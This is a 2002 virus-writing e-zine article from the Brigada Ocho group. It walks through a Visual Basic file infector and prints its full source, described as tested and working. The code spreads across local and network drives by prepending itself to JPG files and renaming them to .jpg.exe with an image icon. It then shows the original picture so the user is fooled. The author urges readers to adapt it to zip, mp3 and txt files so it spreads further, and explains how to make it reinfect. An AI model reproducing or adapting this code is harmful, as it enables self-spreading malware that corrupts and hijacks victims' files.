--------------------> Independant Jpg virus <------------------ Author: KaGra,for e-zine#2,Brigada Ocho virii group member A. This is a different approach of how to make jpg,txt,doc,zip and generally almost all kind of file viruses,using VB.I'd like first to give an idea of such an infection,and then I will describe and give the source code of a jpg virus. Alcopaul has already written code of jpg infector,but has a limitation on replication and moving from PC to another,because infected files are not independant.So,I made an independant jpg infector.In my case,the way this virus works can be used to infect every file type you want.The way is this: The virus finds a file with the appropriate extension to infect.He then opens it,reads it's code and closes it.After that,the virus opens itself and reads his code and closes himself.He now opens again the victim,writes it's code (virus code) at the start of the victim file,and writes the victim's code (which has already read at first place) after he writes his code.The virus then renames the victim from xxx.jpg into xxx.jpg.exe.The virus is designed with the same icon as a common jpg file.The virus code is also designed (I choose this) to read all bytes after a specified size by it's creator (meaning,he is designed to read all bytes after let's say the 4000 byte,till the end of the file) .All those bytes are the bytes of the victim file.So when the infected file runs again (which is now an exe basically,but this can be shown only if full extension show option is enabled),the virus runs, extracts the jpg file from his end,he makes one xxx.jpg (same name with his), runs it with explorer,then hides it (it could also erase it,meaning the jpg) and then starts infection again.The only thing a user can see and realize it is not a jpg is the .jpg.exe extension (don't forget the same icon). I also wanna say that if the virus completes infecting all jpg files, he creates a file with some trush.The next time the virus runs,he'll check for this file,and if he founds it,he will only unpack from himself the jpg,but not infect anything. This virus is dangerous and has some bad stuff.Those are: 1. Infecting all jpg files in HD and network may corrupt other functions, eg. may a game or html application need the jpg files.You may say that,ok, the "fake" jpg will extract the read and run it,but don't forget that when the infection occurs,jpg become exe.So html may want the .jpg extension from the beggining and not as a "child" of the exe. 2.It has the disadvantage of .jpg.exe extension. 3.It infects just once,because of the file it creates. You can easily fix 1. and 3.You fix 1. by infecting let's say txt or zip, because there is not an application thet needs them.You fix 3. by not creating the file.But 2. cannot be fixed.Althought it cannot,it's a good virus,but I again screem:don't use it on jpg,but in txt,zip,even mp3...Just change a bit the following source code I give you.The only changes to make are the extension and the "shell" command not be used with Internet Explorer,but if u infect txt use "shell" command with notepad,etc. You also have to change the size of bytes the virus is going to keep from an infected file (which I said 1000000 times is a jpg.exe now).Those bytes are the REAL virus code,the other are victim's bytes,which will be extracted upon jpg.exe "victim"-infected execution.So,CHANGE A BIT the source to make it more effective,other wise He'll only destroy and not replicate. Don't Forget to tell You about a msgbox payload!!!!!!!See source code!!! Ok OK OK.....TiME For PhUn!!Take a ciggAre,A DrinK and Phyco yourself wiTh The following Virii Source code (Tested,full-Functional)!!!!!!!!!! -------------------------------> Code Starts Here <------------------------------ Private Sub Form_Load() On Error Resume Next Randomize Dim rubishcode As String Dim picture As String Set fso = CreateObject("scripting.filesystemobject") Set tempfold = fso.getspecialfolder(2) payload = Int(999 * Rnd) If payload = 783 Then MsgBox "@@@ I LoVe GeOrGia in PaTra..I'm dOOmeD @@@", 64, "Eva ViRus VeRsIon 2.0" End If myname = App.Path & "\" & App.EXEName & ".exe" buff = FileLen(myname) If buff > 20992 Then rub = buff - 20992 Open (myname) For Binary Access Read As #1 rubishcode = Space(rub) Seek #1, 20993 Get #1, , rubishcode Close #1 picture = tempfold & "\" & App.EXEName & ".jpg" Open (picture) For Binary Access Read Write As #2 Put #2, , rubishcode Close #2 ddd = "c:\Program Files\Internet Explorer\iexplore.exe " & picture idProg = Shell(ddd, vbMaximizedFocus) SetAttr picture, vbSystem + vbHidden Else MsgBox "Out of memory!", 16, "Internet Explorer" End If autos = tempfold & "\win32dll.vid" If (fso.fileexists(autos)) Then End End If Set dr = fso.Drives For Each d In dr If d.DriveType = 2 Or d.DriveType = 3 Then list (d.Path & "\") End If Next Open (autos) For Binary Access Read Write As #22 Put #22, , "390842038209384023980984023 src coded next" Close #22 End End Sub Sub list(dir) On Error Resume Next Set fso = CreateObject("scripting.filesystemobject") Set f = fso.GetFolder(dir) Set ssf = f.Subfolders For Each fil In ssf spreadmailto (fil.Path) list (fil.Path) Next End Sub Sub spreadmailto(dir) On Error Resume Next Dim readvictim As String Dim readme As String Set fso = CreateObject("Scripting.filesystemobject") Set f = fso.GetFolder(dir) Set cf = f.Files For Each fil In cf ext = fso.GetExtensionName(fil.Path) ext = LCase(ext) If (ext = "jpg") Then 'Main replication routine starts HeRe! myname = App.Path & "\" & App.EXEName & ".exe" victimlen = FileLen(fil.Path) Open (fil.Path) For Binary Access Read As #3 readvictim = Space(victimlen) Get #3, , readvictim Close #3 Open (myname) For Binary Access Read As #4 readme = Space(20992) Get #4, , readme Close #4 Open (fil.Path) For Binary Access Read Write As #5 Put #5, , readme Put #5, , readvictim Close #5 newname = fil.parentfolder & "\" newname2 = Left(fil.Name, 1) newname3 = Right(fil.Name, Len(fil.Name) - 1) newname4 = LCase(Left(newname3, Len(newname3) - 3) & "exe") newnameall = newname & newname2 & newname4 Name fil.Path As newnameall 'Main replication Routine Ends HeRe! myname = "" readme = "" readvictim = "" End If Next End Sub -------------------------------> Code Ends Here <------------------------------ Some comments about tHe Source code:The number 20992 is the number of bytes of the virus,althought the victim (the jpg.exe) is bigger so many bytes,as the original jpg victim was.You have to change this number and be the numbner of bytes of the first virus,which is the compiled one.The first virus when he runs he pops up an error message,because he has not any jpg to extract from inside him.But all infected jpg,which are now jpg.exe with jpg icon (I'll say it again and again to make it clear enough) when they run they will show the original jpg (with the same name as the jpg.exe they come from),and not the pop up message.This behavour was programmed by the virii writer of this vir. As you realize,after the first infection,the PC won't have any jpg files at all, but all jpg files will have been replaced (in the same places) by same-named exe.jpg files,with a jpg icon,and when run they will also show the jpg file.Internet Explorer will also say that he opened a jpg file.So no need for infected signature needed, because a jpg exists or not.The extracted jpg are set to hidden.If you also remove the source of the win32dll.vid file creation,when virii runs will infect again any new jpg arrived in the machine since last infection. LaSt WorDs: Don't Use it as It is.Make it mp3 or zip infector.Jpg files are needed for the system.Infect those Kind of PhileZ that are not called from the system as they are,and are not necessary.Zip and mp3 (and txt let's say and others) are not important for the system,but they walk easily from PC to PC... With Respect to aLL Brigada Ocho MeMbers KaGra,October 2002,Greece